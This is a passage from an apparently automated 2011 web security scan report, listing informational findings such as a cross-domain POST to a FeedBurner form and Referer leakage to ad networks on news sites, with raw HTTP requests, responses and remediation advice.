Date: Sun, 04 Sep 2011 01:03:10 GMT
Content-Length: 8295

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e62ce4e069e41f52953044" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">466</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span>
...[SNIP]...

16.4. http://www.youtube.com/embed/xXftjfC3b5o previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.youtube.com
Path:	/embed/xXftjfC3b5o

Request 1

GET /embed/xXftjfC3b5o HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 18487
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Summary of State Collective Bargaining Agreements - YouTube</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflIi8lfi.css">

...[SNIP]...
/div>'
});
yt.setConfig({
'PLAYER_CONFIG': {"url": "http:\/\/s.ytimg.com\/yt\/swfbin\/watch_as3-vflUXLhsZ.swf", "min_version": "8.0.0", "args": {"el": "embedded", "fexp": "914025,904531,904427", "use_fullscreen_popup": "1", "is_html5_mobile_device": false, "allow_embed": 1, "allow_ratings": 0, "hl": "en_US", "use_tablet_controls": "0", "eurl": "http:\/\/blogs.sacbee.com\/the_state_worker\/", "iurl": "http:\/\/i1.ytimg.com\/vi\/xXftjfC3b5o\/hqdefault.jpg", "view_count": 578, "title": "Summary of State Collective Bargaining Agreements", "avg_rating": 0.0, "video_id": "xXftjfC3b5o", "length_seconds": 353, "iurlmaxres": "http:\/\/i1.ytimg.com\/vi\/xXftjfC3b5o\/maxresdefault.jpg", "enablejsapi": "0", "sk": "UdJ6YnAa5tIWatvcO7n5eGOtBivIhfITC", "use_native_controls": false, "rel": "1", "playlist_module": "http:\/\/s.ytimg.com\/yt\/swfbin\/playlist_module-vflMizWia.swf", "iurlsd": "http:\/\/i1.ytimg.com\/vi\/xXftjfC3b5o\/sddefault.jpg"}, "url_v9as2": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflNVWyCR.swf", "params": {"allowscriptaccess": "always", "allowfullscreen": "true", "bgcolor": "#000000"}, "attrs": {"width": "100%", "id": "video-player", "height": "100%"}, "url_v8": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflNVWyCR.swf"}
});
yt.setMsg('HTML5_DEFAULT_FALLBACK', "Your browser does not currently recognize any of the video formats available.\u003cbr\u003e\u003ca href=\"\/html5\"\u003eClick here to visit our frequently asked questions about HTML5 video.\u003c\/a\u003e");
yt.setMsg('HTML5_SUBS_TRANSCRIBED', "transcribed");

yt.embed.writeEmbed();
</script>

</body>
</html>

Request 2

GET /embed/xXftjfC3b5o HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:47 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 18449
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Summary of State Collective Bargaining Agreements - YouTube</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflIi8lfi.css">

...[SNIP]...
/div>'
});
yt.setConfig({
'PLAYER_CONFIG': {"url": "http:\/\/s.ytimg.com\/yt\/swfbin\/watch_as3-vflUXLhsZ.swf", "min_version": "8.0.0", "args": {"el": "embedded", "fexp": "914027,903103,913501,913002", "use_fullscreen_popup": "1", "is_html5_mobile_device": false, "allow_embed": 1, "allow_ratings": 0, "hl": "en_US", "use_tablet_controls": "0", "eurl": "", "iurl": "http:\/\/i1.ytimg.com\/vi\/xXftjfC3b5o\/hqdefault.jpg", "view_count": 578, "title": "Summary of State Collective Bargaining Agreements", "avg_rating": 0.0, "video_id": "xXftjfC3b5o", "length_seconds": 353, "iurlmaxres": "http:\/\/i1.ytimg.com\/vi\/xXftjfC3b5o\/maxresdefault.jpg", "enablejsapi": "0", "sk": "8YuEOJO4rdnOL3CPCYQ2sismhKkU5W0rC", "use_native_controls": false, "rel": "1", "playlist_module": "http:\/\/s.ytimg.com\/yt\/swfbin\/playlist_module-vflMizWia.swf", "iurlsd": "http:\/\/i1.ytimg.com\/vi\/xXftjfC3b5o\/sddefault.jpg"}, "url_v9as2": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflNVWyCR.swf", "params": {"allowscriptaccess": "always", "allowfullscreen": "true", "bgcolor": "#000000"}, "attrs": {"width": "100%", "id": "video-player", "height": "100%"}, "url_v8": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflNVWyCR.swf"}
});
yt.setMsg('HTML5_DEFAULT_FALLBACK', "Your browser does not currently recognize any of the video formats available.\u003cbr\u003e\u003ca href=\"\/html5\"\u003eClick here to visit our frequently asked questions about HTML5 video.\u003c\/a\u003e");
yt.setMsg('HTML5_SUBS_TRANSCRIBED', "transcribed");

yt.embed.writeEmbed();
</script>

</body>
</html>

17. Cross-domain POST previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/communities/campusrivalry/topics

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

email
uri
title
loc

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /communities/campusrivalry/topics HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Content-Length: 40492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicationServer" xmlns:og=
...[SNIP]...
<div class="form-row">
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=CampusRivalryCommunityFeed', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<input type="text" style="width:140px;margin-bottom:1px;" name="email"/>
...[SNIP]...

18. Cross-domain Referer leakage previous next
There are 32 instances of this issue:

http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10
http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10
http://ad.doubleclick.net/adj/sacbee_cim/
http://ad.doubleclick.net/adj/uap.reuters/uap
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://ad.yieldmanager.com/pixel
http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62
http://cdn.optmd.com/V2/89733/235451/index.html
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.npc-mcclatchy.overture.com/js_1_0/
http://cms.ad.yieldmanager.net/v1/cms
http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js
http://imp.fetchback.com/serve/fb/imp
http://s6.scribdassets.com/aggregated/javascript/base.js
http://static.lingospot.com/js/all.js
http://www.facebook.com/plugins/likebox.php
http://www.personalcreations.com/
http://www.personalcreations.com/
http://www.personalcreations.com/
http://www.personalcreations.com/
http://www.reuters.com/assets/commentsChild
http://www.reuters.com/assets/newsFlash
http://www.scribd.com/embeds/63688924/content
http://www.scribd.com/embeds/63688924/content_inner

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

18.1. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3093.150834.0497248606521/B5801515.10

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=2607056080429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiSMBgkA9QEBAA/url/;

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3227824/rnBanner_728x90_GreatExpv2.gif

Request

GET /adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=2607056080429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiSMBgkA9QEBAA/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 499
Date: Sun, 04 Sep 2011 00:48:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/4/3c/%2a/q;245151336;3-0;0;69806205;3454-728/90;43834042/43851829/1;;~sscs=%3fhttp://r.turn.com/r/formclick/id/WwSFP7EfLiSMBgkA9QEBAA/url/http://www.rightnow.com/index.php?cex=1780Turn"><img src="http://s0.2mdn.net/viewad/3227824/rnBanner_728x90_GreatExpv2.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

18.2. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3093.150834.0497248606521/B5801515.10

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=3730451366222604100?;click=http://r.turn.com/r/formclick/id/RKeRt8A5xTMAUAAA-QEBAA/url/;

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3227824/rnBanner_728x90_CEScore.gif

Request

GET /adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=3730451366222604100?;click=http://r.turn.com/r/formclick/id/RKeRt8A5xTMAUAAA-QEBAA/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 499
Date: Sun, 04 Sep 2011 00:48:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/4/3c/%2a/u;245151336;1-0;0;69806205;3454-728/90;43803591/43821378/1;;~sscs=%3fhttp://r.turn.com/r/formclick/id/RKeRt8A5xTMAUAAA-QEBAA/url/http://www.rightnow.com/cx-score.php?cex=1780Turn"><img src="http://s0.2mdn.net/viewad/3227824/rnBanner_728x90_CEScore.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

18.3. http://ad.doubleclick.net/adj/sacbee_cim/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sacbee_cim/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/sacbee_cim/;dcove=o;share=partnersoldinvite;sz=24x24;dcmt=text/html;ord=1315097366526?

The response contains the following link to another domain:

http://www.meebo.com/skin/beta/img/blank.gif

Request

GET /adj/sacbee_cim/;dcove=o;share=partnersoldinvite;sz=24x24;dcmt=text/html;ord=1315097366526? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 313
Date: Sun, 04 Sep 2011 00:48:49 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/m;240490578;0-0;1;46669306;3634-24/24;41913949/41931736/1;;~aopt=2/2/95/0;~sscs=%3fhttp://www.meebo.com/blank.html"><img src="http://www.meebo.com/skin/beta/img/blank.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.4. http://ad.doubleclick.net/adj/uap.reuters/uap previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/uap.reuters/uap

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/uap.reuters/uap;site=uap;sect=reuters;!c=reuterspm=1;xa=n;pos=1;tile=1;sz=728x90;ord=1433287?

The response contains the following link to another domain:

http://www.reuters.com/assets/newsFlash?&flashPath='+flashURL+escape(flashQuery)+'&vcount=1&videoChannel='+myChannel+'&w=728&h=90&akamaize=n&gifPath='+escape(gifURL)+'&clickTag='+escape(giftag)+

Request

GET /adj/uap.reuters/uap;site=uap;sect=reuters;!c=reuterspm=1;xa=n;pos=1;tile=1;sz=728x90;ord=1433287? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 775
Date: Sun, 04 Sep 2011 00:47:51 GMT

document.write('');

var clickURL = new Array();
var myChannel = 1;
var flashURL = "http://sales.reuters.com/pitches/roughcuts/rc728x90.swf";
clickURL = "http://www.reuters.com/";
var gifURL = "http:
...[SNIP]...
rs.com/pitches/roughcuts/rc728x90.gif";
var giftag = "http://www.reuters.com/";

var flashQuery = '?clickTag=' + escape(clickURL);
flashQuery = flashQuery + "&channelName="+myChannel;

document.write('<iframe name="us" frameborder="0" border="0" width="728" height="90" src="http://www.reuters.com/assets/newsFlash?&flashPath='+flashURL+escape(flashQuery)+'&vcount=1&videoChannel='+myChannel+'&w=728&h=90&akamaize=n&gifPath='+escape(gifURL)+'&clickTag='+escape(giftag)+"\"frameborder='0' scrolling='no' style='overflow:hidden'></iframe>
...[SNIP]...

18.5. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26912047&ahcid=2168902&bimpd=_P8jnlWa9XstK_JlmmehibBCY86uUcZ8orSis2gk3CgGuM8NRppyPQMYvcwYVWxeqx53lV-injqapvMTqVcy93ETQudoxG65t8gPvD3_8uXTH1PXOPFQZu8QV_sfud_H-APXWDieQ47BkVHFFBn37s3aR3R9fKaUZJwqF3RKDtidgFaK5usOyzENC88rTUlt9K10asyG35OWlNfIYOZ-eD5tcSKw-zblptFUhK9YrBvJ-WVZmeLXwW90Vc9Kb9XoiPnsI1H5EzsiLAXyc7PFNmMqw1dLCgnGdMDgUmN3gwdG_Ur_2SMU4K10y_Sli8mM2o2RfArbjquS3LhtH_oucb3wc-cQ7FRKnITKYzO3zYXWG83x93SQchtOADUffiJhCEHm6r5PNXkH9qRXbUWExW_-Tu619iR6e1KbNlVj8jLndn3HHWXSm6j08SLj-h_ckdMj51v2x5gNhdpsMl_xftjg47NtKOd3aMYaFKX0mDx-mbKM0JHYn1hPNWK3mE7pzqC_aS7mkgsjA3S3GAANk8l2hYjwLveMS5-0Prm8ku-d-0Mgw9kibbpEMGHOE3HL6dCtmc69w_hrmFS4bSqF1Ubrzov4KJkplEjIfx4sijhgID_WtH2HGV-ZlBaxQA1ij1j_O9y58VxgD6JjAd6GfmoJ8UbwkKQyww1upyp3jn-KeGFWA05C4wMLlJET2Sr393OncBALoxLqvhLiy_Csz4BhnEKFF2M8my_fgvGuVC-BGn7V08Zk_msX51p9Pm_1V71_KFY8MHiZdUStS_Pc88kzr_aJ80D7tEUMLPW-_InB3ZbanTW1OTZfNoJuT_Q8bPiK77OYvzyO19oo0lS1JrBteXm6E3IqGkdPbGLUoEv66yPDCbC2aqvzIe2Oz4Dl&acp=1.72

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3093.150834.0497248606521/B5801515.10;abr=!ie4;abr=!ie5;sz=728x90;ord=2607056080429450331?
http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=2607056080429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiQWAQ8AAwIBAA/url/;
http://ad.doubleclick.net/adj/N3093.150834.0497248606521/B5801515.10;abr=!ie;sz=728x90;ord=2607056080429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiQWAQ8AAwIBAA/url/;

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 06 Sep 2011 00:55:06 GMT
Set-Cookie: uid=4447451951399893309; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=C5fpYpilMyxHrPIR--3QkiHvKDNi_uncK1CZ9qMjBiHJxmeG753N3cyfpzvDjP2CIQIVonNUzt8CzdLhUy1rOScdAv5WskG6P8YmJYM-cP7i3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:55:05 GMT
Content-Length: 9577

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

document.write('\n\n\n    \n\n     \n    \n        \n        \n            \n    \n    \n\n\n\n\n\n\n        \n        \n    \n                \n            \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=2607056080429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiQWAQ8AAwIBAA/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3093.150834.0497248606521/B5801515.10;abr=!ie;sz=728x90;ord=2607056080429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiQWAQ8AAwIBAA/url/;">\n</SCRIPT>
...[SNIP]...
<A HREF="http://r.turn.com/r/formclick/id/WwSFP7EfLiQWAQ8AAwIBAA/url/http://ad.doubleclick.net/jump/N3093.150834.0497248606521/B5801515.10;abr=!ie4;abr=!ie5;sz=728x90;ord=2607056080429450331?">\n<IMG SRC="http://ad.doubleclick.net/ad/N3093.150834.0497248606521/B5801515.10;abr=!ie4;abr=!ie5;sz=728x90;ord=2607056080429450331?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

18.6. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=26912083&ahcid=2168938&bimpd=pCreIYJavyNiKT8OQHFCSnu-vORVAfADNWaIrVAJW9V1OJxo6MJDRlBTc3fVSGqORiXDRlomnL_mfAoVZXeCkL8wvAhJVp5vH1605NNaPKgd1x29xXl5OSgnSbh900QIFhYiHQW0teqBC570BVUfktff2qOd8TAuM1o70SLAMfwCKpFmO4iIlB0kM7YKTICsL7R4Llxu6gw1UDBG-W9xu9Cw1Mz4UX51ay3f8dUZrSSA7ScN_yzVCT_qn-_wh7GkjVBkWJOw8E0SsEBhkIDT30v0_tDzWZMCygX7uwRksdEjoCAUEtzyi3w02uZQh4CPlbbQCKaV1kCXC1z-_nrIRv3Dt_DOnJ6szh2BeUfdUcDG-dcfe7AZKpps-jRxx503w5ouEVi7AI_5bXPRNdcP8QFcyCrv21DOcZZtn_24bXnbuGlDBbzSoryu0WxJZt3-TbjA4JdW6zB8Hr71jKGygnf979g2SfUVLE2EEGA1_P18fHSjIFmLLv9mvWkjikr6tE1_pTGVcNndvBjk5O8WpORSUX8h57ktArQiQRf_VM7suSEszTFtXJTNBWjhIyl4HF2axn5veQQlnqlFyRkks1_f7KC3VLmRxk7zb_BZDIJlqbhnVBeCxCmDhdk0jNpMHiPyrAZz5UKLC_VL_S0H0uZu9JsuecfTkRFyKcv1KqxdXU0tBSOr2Azj03ZXjmB-xXJHA51HCyRbV39W-BZaYUYafA0sG2GU1QMSEGn7mGlP_0gfI5Dj0uZ98BGVjFp-ixyNrFPa4sCVYWwv6KsGYXxI4IYGMiYon4s4QKZwiq1HQL2uATEn9inEHrl7lClpZsz5pj9OB5Dloc6omzDygRQ_CVxmcL7l1mtL_HnfnUZw--1JIlgG4EVQJnxieWB1EvmONAwrRCaTz4lB29IygQ&acp=F2A40808BF222937&rtbacid=b955a540e6a0f13e962aa5535b75fe6909df734c

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3093.150834.0497248606521/B5801515.10;abr=!ie4;abr=!ie5;sz=728x90;ord=3730451366222604100?
http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=3730451366222604100?;click=http://r.turn.com/r/formclick/id/RKeRt8A5xTO9bgoAAgIBAA/url/;
